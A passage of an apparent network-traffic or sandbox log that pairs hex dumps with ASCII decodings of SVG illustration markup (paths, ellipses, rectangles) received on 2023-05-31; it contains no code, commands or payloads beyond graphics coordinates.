2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3822INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3838INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3854INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3870INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3886INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3902INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3918INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3934INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3950INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3966INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3998INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4014INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                                                        Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4030INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                                        Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4046INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                                                        Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4062INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                                                        Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4078INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                                                        Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4094INData Raw: 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 34 22 20 64 3d 22 4d 39 33 33 2e 37 32 2c 32 39 35 2e 38 33 61 33 31 2e 37 31 2c 33 31 2e 37 31 2c 30 2c 30 2c 31 2d 36 2e 32 2e 35 31 2c 33 32 2e 34 33 2c 33 32 2e 34 33 2c 30 2c 30 2c 31 2d 36 2e 32 34 2d 2e 35 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 35 22 20 64 3d 22 4d 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: ,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-114" d="M933.72,295.83a31.71,31.71,0,0,1-6.2.51,32.43,32.43,0,0,1-6.24-.51"/><path class="cls-115" d="M93
